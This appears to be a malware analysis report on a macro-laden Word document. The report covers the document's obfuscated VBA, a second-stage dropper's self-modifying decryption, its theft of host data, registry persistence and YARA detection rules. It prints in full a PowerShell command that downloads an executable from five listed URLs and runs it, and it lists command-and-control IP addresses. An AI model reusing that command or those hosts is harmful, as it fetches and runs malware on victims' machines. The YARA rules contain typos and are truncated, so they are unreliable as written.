Professional Documents
Culture Documents
1. File info
File name: FILE-025909.doc
MD5: 7beeda071116da212aa8d3ffc4631516
Size: 275,584 Bytes
2. Analysis Environments
Operating System Windows 7- 32bit
Analysis Tool IDA, Immunity Debugger, Olly Dbg,
Exeinfo PE, SysTracer, ProcessExplorer,
VBA Debbuger, OfficeMalScanner
3. Analysis Result
Use OfficemalScanner check specimen and find 3 VB Macro files that is into malware.
After dumping VB Macro, notice they were obfuscate.
Use VBA Debbuger in Office to debug malware. Throughout the process of debugging,
we get a string that is used to run the shell as show bellow.
1
This shell will run a powershell script:
powershell $Tmz=new-object
Net.WebClient;$qYd='http://hockeystickz.com/XE6LOJ@http://jeffweeksphotography.co
m/7mHSXX@http://hellcatshockey.org/k@http://gsverwelius.nl/7Sf68C7x@http://aile.pu
b/KmKEymIK'.Split('@');$qtJ = '979';$ITK=$env:public+'\'+$qtJ+'.exe';foreach($Puq
in $qYd){try{$Tmz.DownloadFile($Puq, $ITK);Invoke-Item $ITK;break;}catch{}}
Its purpose is this malware download a excute file with name is 797.exe and run this file.
C&C of document malware:
http://hockeystickz.com/XE6LOJ
http://jeffweeksphotography.com/7mHSXX
http://hellcatshockey.org/k
http://gsverwelius.nl/7Sf68C7x
http://aile.pub/KmKEymIK
Analyze Excute file “979.exe”
File info
MD5: 8d79ee8da119c2856f3fbaef9b8fa938
Size: 472,064 Bytes
Use debbuger to debug specimen, I notice it uses the self modify technique to make it
difficult to analyze. Malware decrytp a lot of byte into its, after copy them into memory,
decrypt and modify on memory.
2
And final, the result is a data segment similar a PE file.
Malware overwrite the above data into malware loaded on memory. The main execute is
into data that is decrypt and write over.
The figure below shows the differences in malware after overwriting executable code in
memory
3
Let’s analyze code on memory.
Malware create a process with name “979.exe”
After copying its, malware create process. This process will create a process with same
name, this behavior is as same as “979.exe” file.
Malware get Computer name, list process running and other data. Data is encode and
encrypt by CryptEncypt API funtion
4
The next step, malware encode data with base64.
C&C servers:
207.255.226.104:50000
67.77.66.132:80
24.37.133.84:80
84.133.37.24:80
207.134.189.64:50000
68.42.248.45:8090
189.225.87.179:8443
41.33.127.215:8080
98.127.32.145:80
98.10.198.137:80
81.7.10.106:7080
5
198.0.227.57:7080
Auto start of malware
Malware creat a key in registry to auto start when system of victim start or restart
4. Yara rule
rule malwareDropper
{
strings:
$mz = "MZ" //Check MZ format
$func_dec = {83 C4 0C BF A2 0F 41 00 8D 6B F1 66 8B 35 F8 85 44 00 83 FB
07 73 01 4B 83 FD 10 73 01 4D 0F B7 C6 85 FF 74 63 3D 90 9B 09 00 75 0C E8 6F 96
01 00 66 8B 35 F8 85 44 00 A1 34 91 45 00 BA 38 00 00 00 8B 08 8D 40 04 81 C1 C0
6A 5F 01 89 48 FC 89 0D 40 91 45 00 4A 75 E9 33 C0 4F 66 85 F6 0F 94 C0 66 A3 D4
85 44 00 8B 44 24 10 83 F8 01 73 05 48 89 44 24 10 81 FF 0C 01 00 00 77 94 6A 29}
$data_en = {01 F3 F5 C6 2C 5E 85 70 80 32 9D CA 0D 76 CE 2E 94 AB 27 AC
39 89 A6 6F 80 BB 97 A1 5B BC 6B 00 03 19 A1 E4 8A BB 98 D6 81 0C 5F 3A 83 BB 74
A0 90 72 5E 3A 88 14 84 59 39 37 9D 6F 6B B9 E9 D8 30 F9 49 B5 02 FC 07 01 BC 3F
F8 F3 CD A1 B3 50 B4 D5 DE 07 FA C3 AE 15 17 DF 9B C6 C3 74 06 FD C1 36 38 A1
AA 7B 52 98 A5 3A C2 1E 8C B6 26 F3 A3 84 3F 72 18 25 4A F0 C0 C3 C7 6F AF 44
A7 6F C5 B4 9F 0F 12 23 D3 77 CB D5 AB 91 FD F5 55 98}
$gen_ip = {E8 C9 B7 FF FF 83 C4 04 85 C0 0F 84 FD 00 00 00 68 FA 8F C0 1D
6
BA 54 00 00 00 B9 40 05 41 00 E8 BA B0 FF FF 8B 4F 14 83 C4 04 8B F0 0F B6 01 50
0F B6 41 01 50 0F B6 41 02 50 0F B6 41 03 50 56 8D 85 50 FF FF FF 6A 40 50 FF 15
6C 35 41 00 83 C4 1C 8B CE E8 25 B1 FF FF 8B 4D FC B8 AB AA AA AA}
condition:
$mz at 0 and (f$unc_dec or $data_en or $gen_ip)
}
rule malwareOffice
{
strings:
$header = {D0 CF 11 E0 A1 B1 1A E1} //Check header office 2003
$shell_execute = {53 68 65 6C 6C [-]6D 73 6F 42 61 72 54 79 70 65 4E 6F 72 6D
61 6C
condition:
$header at 0 and $shell_execute
}
5. Conclusion
This malware is a downloader and obfuscate. Dropper malware steals information after
infecting the victim’s computer. It self modify on memory to makes it difficult for an
analyst. It decrypt a piece of data and then overwrite its own executable code in memory,
after executing main code.